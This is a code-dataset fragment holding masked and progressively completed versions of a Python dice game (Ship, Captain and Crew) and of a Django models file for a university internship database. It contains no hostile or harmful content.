"step-2": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? ')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? ')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\n<mask token>\nfor i in players:\n multi()\n",
"step-3": "<mask token>\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? ')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? ')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\ninp = input('How many players are there? ')\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()\n",
"step-4": "import random\n\n\ndef multi():\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input('Hit enter to roll')\n if inp == '':\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)\n ]\n total_scc = sum(result_scc)\n inp_scc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc == 'both':\n print('Total score: ' + str(total_scc) + '.')\n if inp_scc == 'neither':\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_scc_none == 'both':\n total_scc_none = sum(roll2_scc)\n print('Total score: ' + str(total_scc_none) + '.')\n if inp_scc_none == 'neither':\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print('Your total score is: ' + str(total_scc_none2\n ) + '.')\n if inp_scc_none == 'one':\n inp_scc_none_one = input(\n 'Which die do you want to keep? ')\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(\n inp_scc_none_one)\n print(roll1_scc_none_one)\n print('Your total score is: ' + str(\n total_scc_none_one) + '.')\n if inp_scc == 'one':\n inp_scc_one = input('Which die do you want to keep? ')\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\n \"Hit enter to roll again or type 'pass' to keep your score \"\n )\n if inp_scc_one2 == 'pass':\n print('Your total score is: ' + str(total_scc_one) +\n '.')\n if inp_scc_one2 == '':\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print('Your total score is: ' + str(total_scc_one2) +\n '.')\n if set(sc).issubset(roll5):\n inp_sc = input(\n 'Now you need a 4(the Crew). Hit enter to roll the remaining dice'\n )\n if inp_sc == '':\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or\n crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_crew == 'both':\n print('Total score: ' + str(total_crew) + '.')\n if inp_crew == 'neither':\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print('Your total score is: ' + str(\n total_crew_none) + '.')\n if inp_crew == 'one':\n inp_crew_one = input(\n 'Which die do you want to keep? ')\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print('Your total score is: ' + str(\n total_crew_one) + '.')\n else:\n inp_sc3 = input('Still no 4. Hit enter to roll again')\n if inp_sc3 == '':\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if \n not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print('Your total score is: ' + str(\n total_crew_sc3) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n 'Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice '\n )\n if inp_ship == '':\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in\n cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\n 'Do you wish to keep one, both, or neither of the remaining dice? '\n )\n if inp_ship_cc == 'both':\n print('Your total is: ' + str(total_ship_cc) + '.')\n if inp_ship_cc == 'neither':\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print('Your total score is: ' + str(\n total_ship_cc_none) + '.')\n if inp_ship_cc == 'one':\n inp_ship_cc_one = input(\n 'Which die do you want to keep? ')\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(\n inp_ship_cc_one)\n print('Your total score is: ' + str(\n total_ship_cc_one) + '.')\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if\n not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print('Your total score is: ' + str(\n total_ship_captain) + '.')\n else:\n print(\n \"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\"\n )\n else:\n n = n + 1\n\n\ninp = input('How many players are there? ')\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()\n",
"step-5": "import random\ndef multi():\n\n scc = [6, 5, 4]\n sc = [6, 5]\n cc = [5, 4]\n crew = [4]\n captain = [5]\n ship = [6]\n n = 0\n while n <= 2:\n inp = input(\"Hit enter to roll\")\n if inp == \"\":\n roll5 = random.choices(range(1, 7), k=5)\n print(roll5)\n if set(scc).issubset(roll5):\n result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]\n total_scc = sum(result_scc)\n inp_scc = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_scc == \"both\":\n print(\"Total score: \" + str(total_scc) + \".\")\n if inp_scc == \"neither\":\n roll2_scc = random.choices(range(1, 7), k=2)\n print(roll2_scc)\n inp_scc_none = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_scc_none == \"both\":\n total_scc_none = sum(roll2_scc)\n print(\"Total score: \" + str(total_scc_none) + \".\")\n if inp_scc_none == \"neither\":\n roll2_scc_none = random.choices(range(1, 7), k=2)\n total_scc_none2 = sum(roll2_scc_none)\n print(roll2_scc_none)\n print(\"Your total score is: \" + str(total_scc_none2) + \".\")\n if inp_scc_none == \"one\":\n inp_scc_none_one = input(\"Which die do you want to keep? \")\n roll1_scc_none_one = random.randint(1, 6)\n total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)\n print(roll1_scc_none_one)\n print(\"Your total score is: \" + str(total_scc_none_one) + \".\")\n if inp_scc == \"one\":\n inp_scc_one = input(\"Which die do you want to keep? \")\n roll1_scc_one = random.randint(1, 6)\n print(roll1_scc_one)\n total_scc_one = roll1_scc_one + int(inp_scc_one)\n inp_scc_one2 = input(\"Hit enter to roll again or type 'pass' to keep your score \")\n if inp_scc_one2 == \"pass\":\n print(\"Your total score is: \" + str(total_scc_one) + \".\")\n if inp_scc_one2 == \"\":\n roll1_scc_one2 = random.randint(1, 6)\n print(roll1_scc_one2)\n total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)\n print(\"Your total score is: \" + str(total_scc_one2) + \".\")\n if set(sc).issubset(roll5):\n inp_sc = input(\"Now you need a 4(the Crew). Hit enter to roll the remaining dice\")\n if inp_sc == \"\":\n roll3 = random.choices(range(1, 7), k=3)\n print(roll3)\n if set(crew).issubset(roll3):\n result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]\n total_crew = sum(result_crew)\n inp_crew = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_crew == \"both\":\n print(\"Total score: \" + str(total_crew) + \".\")\n if inp_crew == \"neither\":\n roll2_crew = random.choices(range(1, 7), k=2)\n print(roll2_crew)\n total_crew_none = sum(roll2_crew)\n print(\"Your total score is: \" + str(total_crew_none) + \".\")\n if inp_crew == \"one\":\n inp_crew_one = input(\"Which die do you want to keep? \")\n roll1_crew_one = random.randint(1, 6)\n print(roll1_crew_one)\n total_crew_one = roll1_crew_one + int(inp_crew_one)\n print(\"Your total score is: \" + str(total_crew_one) + \".\")\n else:\n inp_sc3 = input(\"Still no 4. Hit enter to roll again\")\n if inp_sc3 == \"\":\n roll3_sc3 = random.choices(range(1, 7), k=3)\n print(roll3_sc3)\n if set(crew).issubset(roll3_sc3):\n result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]\n total_crew_sc3 = sum(result_crew_sc3)\n print(\"Your total score is: \" + str(total_crew_sc3) + \".\")\n else:\n print(\"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\")\n if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:\n inp_ship = input(\n \"Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice \")\n if inp_ship == \"\":\n roll4_ship = random.choices(range(1, 7), k=4)\n print(roll4_ship)\n if set(cc).issubset(roll4_ship):\n result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]\n total_ship_cc = sum(result_ship_cc)\n inp_ship_cc = input(\"Do you wish to keep one, both, or neither of the remaining dice? \")\n if inp_ship_cc == \"both\":\n print(\"Your total is: \" + str(total_ship_cc) + \".\")\n if inp_ship_cc == \"neither\":\n roll2_cc = random.choices(range(1, 7), k=2)\n print(roll2_cc)\n total_ship_cc_none = sum(roll2_cc)\n print(\"Your total score is: \" + str(total_ship_cc_none) + \".\")\n if inp_ship_cc == \"one\":\n inp_ship_cc_one = input(\"Which die do you want to keep? \")\n roll1_ship_cc_one = random.randint(1, 6)\n print(roll1_ship_cc_one)\n total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)\n print(\"Your total score is: \" + str(total_ship_cc_one) + \".\")\n if set(captain).issubset(roll4_ship):\n roll3_captain = random.choices(range(1, 7), k=3)\n print(roll3_captain)\n if set(crew).issubset(roll3_captain):\n result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]\n total_ship_captain = sum(result_ship_captain)\n print(\"Your total score is: \" + str(total_ship_captain) + \".\")\n else:\n print(\"Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.\")\n else:\n n = n + 1\n\n\ninp = input(\"How many players are there? \")\nplayers = range(int(inp))\nroll_dict = dict()\nfor i in players:\n multi()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class cursos(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class faculdades(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class faculdades(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
from django.db import models
class faculdades(models.Model):
codigo = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
cidade = models.CharField(max_length=30)
estado = models.CharField(max_length=20)
pais = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key=True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade',
on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key=True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models
.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key=True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models
.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest',
on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % self.codigo
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
<|reserved_special_token_1|>
from django.db import models
class faculdades(models.Model):
codigo = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=50)
cidade = models.CharField(max_length=30)
estado = models.CharField(max_length=20)
pais = models.CharField(max_length=20)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'faculdades'
verbose_name = 'Cad.Faculdade'
class cursos(models.Model):
codigo = models.AutoField(primary_key = True)
nome = models.CharField(max_length=50)
departamento = models.CharField(max_length=30)
faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'cursos'
verbose_name = 'Cad.Curso'
class profcoorest(models.Model):
masp = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=50)
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'profcoorest'
verbose_name = 'Cad.Profcoorest'
class alunos(models.Model):
matricula = models.IntegerField(primary_key = True)
nome = models.CharField(max_length=100)
sexo = models.CharField(max_length=1)
datanasc = models.DateField()
periodo = models.IntegerField()
curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)
def __str__(self):
return self.nome
class Meta:
managed = False
db_table = 'alunos'
verbose_name = 'Cad.Aluno'
class estagio(models.Model):
codigo = models.AutoField(primary_key = True)
aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)
profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)
remunerado = models.CharField(max_length=1)
valor = models.DecimalField(max_digits=6, decimal_places=2)
empresa = models.CharField(max_length=30)
cargahr = models.IntegerField()
descr_est = models.CharField(max_length=256)
resp_est = models.CharField(max_length=50)
def __str__(self):
return '%s' % (self.codigo)
class Meta:
managed = False
db_table = 'estagio'
verbose_name = 'Cad.Estagio'
|
flexible
|
{
"blob_id": "20e5220ce23aaaedbfafe599b352f5d3a220e82e",
"index": 6687,
